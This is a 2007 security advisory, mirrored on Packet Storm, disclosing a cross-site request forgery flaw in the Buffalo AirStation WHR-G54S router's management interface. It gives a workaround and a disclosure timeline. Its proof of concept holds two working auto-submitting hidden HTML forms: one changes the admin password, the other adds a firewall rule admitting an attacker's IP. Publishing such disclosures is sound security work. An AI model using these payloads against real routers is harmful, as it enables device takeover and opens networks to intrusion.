what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

buffalo_070907.txt

buffalo_070907.txt
Posted Sep 8, 2007
Authored by Henri Lindberg | Site louhi.fi

The Buffalo AirStation WHR-G54S web management interface suffers from a cross site request forgery vulnerability.

tags | advisory, web, csrf
SHA-256 | 2c5d4202d43918d840d2e7aa01dc9415e6371116fce87e2832622a31e12acd55

buffalo_070907.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Louhi Networks Oy
-= Security Advisory =-


Advisory: Buffalo AirStation WHR-G54S Web Management CSRF
vulnerability
Release Date: 2007-09-07
Last Modified: 2007-09-07
Authors: Henri Lindberg, Associate of (ISC)²
[henri d0t lindberg at louhi d0t fi]

Application: Buffalo AirStation Web Management

Devices: WHR-G54S Ver.1.20, possibly other Buffalo products
Severity: Cross site request forgery in management interface
Risk: Moderate
Vendor Status: No response from vendor.
References: http://www.louhi.fi/advisory/buffalo_070907.txt


Overview:

During cursory inspection of WHR-G54S it was discovered that a cross
site request forgery vulnerability exists in the management
interface. Thus, it is possible for an attacker to perform any
administrative action in the management interface. These include
e.g. changing administrative password or adding new firewall rules.


Details:

Buffalo AirStation WHR-G54S Ver.1.20 device management interface
does not validate the origin of an HTTP request. If attacker is able
to make user visit a hostile web page, a device can be controlled
by submitting suitable forms. It is possible to add new users for
example.

Successful attack requires that the attacker knows the management
interface address for the target device. As authentication is done
using HTTP Basic authentication, exploiting this vulnerability
requires more effort compared to forms authentication.


Proof of Concept:

<html>
<body onload="document.CSRF.submit()">
<form name="CSRF" method="post"
action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=ap.html
"style="display:none">

<input name="ap" value="Evil">
<input name="TEST_INPUT" value="1">
<input name="edit_ropass" value="evil">
<input name="edit_ropass2" value="evil">
<input name="ropass" value="live">
<input name="gupass" value="">
</form>
</body>
</html>

Note: ropass value is reversed edit_ropass value.

<html>
<body onload="document.CSRF.submit()">
<form name="CSRF" method="post"
action="http://192.168.11.1/cgi-bin/cgi?req=inp&res=filter_ip.html"
style="display:none">

<input name="sela" value="ACCEPT">
<input name="sel_direction" value="WAN">
<input name="H_sour_ip" value="1.1.1.1">
<input name="H_dest_ip" value="">
<input name="H_prt" value="all">
<input name="Do_ADDtop" value="Add%A0%28Head%29">

</form>
</body>
</html>

1.1.1.1 = attacker's IP address


Workaround:

Do not browse untrusted websites while using the management
interface.

Log out after administering the device.

More information

http://en.wikipedia.org/wiki/Cross-site_request_forgery

Disclosure Timeline:

XX July 2007 - Discovered the issue
15. August 2007 - Contacted Buffalo
17. August 2007 - Contacted Buffalo again.
7. September 2007 - No response from Vendor.
7. September 2007 - Advisory released


Copyright 2007 Louhi Networks Oy. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAkbhNJIACgkQ3TZNEGeZkm50SACcCHiOtcfCycfYcxr3lsQPh/J3
Aa8AoKVr6BmKMamG3a7mQCAvO0FV+6y6
=+E8f
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close